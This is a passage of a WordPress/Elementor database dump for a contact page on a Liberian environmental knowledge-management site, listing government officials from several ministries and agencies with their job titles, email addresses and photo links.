href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24532,3621,'_elementor_edit_mode','builder'),(24533,3621,'_elementor_template_type','wp-page'),(24534,3621,'_elementor_version','3.0.16'),(24535,3621,'_wp_page_template','default'),(24536,3621,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 